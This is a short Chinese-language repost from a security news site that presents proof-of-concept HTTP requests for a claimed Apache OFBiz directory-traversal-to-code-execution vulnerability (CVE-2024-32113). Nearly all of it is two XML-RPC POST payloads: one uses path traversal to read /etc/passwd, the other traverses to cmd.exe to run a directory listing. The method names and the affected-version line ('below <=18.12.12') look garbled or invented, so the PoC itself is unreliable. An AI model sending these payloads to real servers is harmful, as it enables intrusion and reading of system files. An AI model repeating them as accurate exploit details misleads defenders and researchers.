Apache OFBiz 目录遍历致代码执行漏洞(CVE-2024-32113)

admin 2024年5月26日11:44:07评论61 views字数 667阅读2分13秒阅读模式

01

CVE-2024-32113

POC:

Poc-1POST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml

<?xml version="1.0"?><methodCall>  <methodName>example.createBlogPost</methodName>  <params>    <param>      <value><string>../../../../../../etc/passwd</string></value>    </param>  </params></methodCall>





Poc-2POST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml

<?xml version="1.0"?><methodCall>  <methodName>performCommand</methodName>  <params>    <param>

<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:</string></value>    </param>  </params></methodCall>

影响版本:Version: below <=18.12.12

原文链接:

原文始发于微信公众号(道玄网安驿站):Apache OFBiz 目录遍历致代码执行漏洞(CVE-2024-32113)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月26日11:44:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache OFBiz 目录遍历致代码执行漏洞(CVE-2024-32113)https://cn-sec.com/archives/2779449.html

发表评论

匿名网友 填写信息